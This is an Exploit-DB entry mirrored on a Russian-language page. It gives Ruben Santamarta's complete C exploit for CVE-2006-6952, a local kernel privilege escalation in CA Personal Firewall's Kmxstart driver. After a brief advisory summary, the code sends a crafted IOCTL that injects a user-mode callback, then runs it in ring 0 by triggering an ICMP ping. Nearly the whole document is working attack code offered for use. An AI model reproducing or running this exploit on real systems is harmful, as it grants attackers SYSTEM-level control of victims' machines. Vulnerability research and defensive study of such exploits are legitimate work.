- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29070
- Проверка EDB
-
- Пройдено
- Автор
- RUBEN SANTAMARTA
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2006-6952
- Дата публикации
- 2006-11-16
C:
// source: https://www.securityfocus.com/bid/21140/info
Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities.
An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers.
These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior.
////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
////
//// Kernel Privilege Escalation #1
//// Exploit
//// Rub�n Santamarta
//// www.reversemode.com
//// 15/10/2006
//// ONLY FOR EDUCATION PURPOSES
//// NO MODIFICATION ALLOWED.
////////////////////////////////////
/////////////////////
/// Compiling:
/// gcc exploit.c -o exploit -lwsock32
/////////////////////
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#include <iphlpapi.h>
typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)( HANDLE IcmpHandle,
HANDLE Event,
FARPROC ApcRoutine,
PVOID ApcContext,
IPAddr DestinationAddress,
LPVOID RequestData,
WORD RequestSize,
PIP_OPTION_INFORMATION RequestOptions,
LPVOID ReplyBuffer,
DWORD ReplySize,
DWORD Timeout);
VOID Ring0Function()
{
DWORD CallBacks[6];
DWORD junk;
HANDLE hDevice;
printf("\n");
printf("-----[RING0]------");
printf("\n");
printf("[*] Message: [.oO Hello From Ring0! Oo.]\n");
printf("[!] Cleaning up Hooked Function\n");
CallBacks[0]=0;
CallBacks[1]=0;
CallBacks[2]=0;
CallBacks[3]=0;
CallBacks[4]=0;
CallBacks[5]=0;
CallBacks[6]=0;
hDevice = CreateFile("\\\\.\\Kmxstart",
0,
0,
NULL,
3,
0,
0);
DeviceIoControl(hDevice,
0x85000004,
(LPVOID)CallBacks,0x18,
(LPVOID)CallBacks,0x44,
&junk,
NULL);
printf("[!] Exploit Terminated\n");
printf("-----[RING0]------");
exit(1);
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{
DWORD *OutBuff,*InBuff;
DWORD dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
HANDLE hDevice;
PIcmpSendEcho2 IcmpSendEcho2;
PIcmpCreateFile IcmpCreateFile;
LPVOID ReplyBuffer;
HANDLE hIcmpFile;
char *SendData = "owned!";
if(argc<2)
{
printf("\nusage> exploit.exe 2K or XP\n");
exit(1);
}
if(!strcmp(argv[1],"2K"))
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpCreateFile");
}
else
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpCreateFile");
}
system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\\\.\\Kmxstart",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] Kmxstart Device Handle [%x]\n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 0x44;
OutBuff = (DWORD *)malloc(OutSize);
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x85000004;
printf("[!] Injecting Malicious Callback\n",dwIOCTL);
OutBuff[0]=0;
OutBuff[1]=0;
OutBuff[2]=0;
OutBuff[3]=(DWORD)Ring0Function;
OutBuff[4]=0;
OutBuff[5]=0;
OutBuff[6]=0;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)OutBuff,0x18,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
hIcmpFile=IcmpCreateFile();
ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
IcmpSendEcho2(hIcmpFile,
NULL,
NULL,
NULL,
inet_addr("66.102.9.99"),
SendData,
sizeof(SendData),
NULL,
ReplyBuffer,
8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
1000);
}
- Источник
- www.exploit-db.com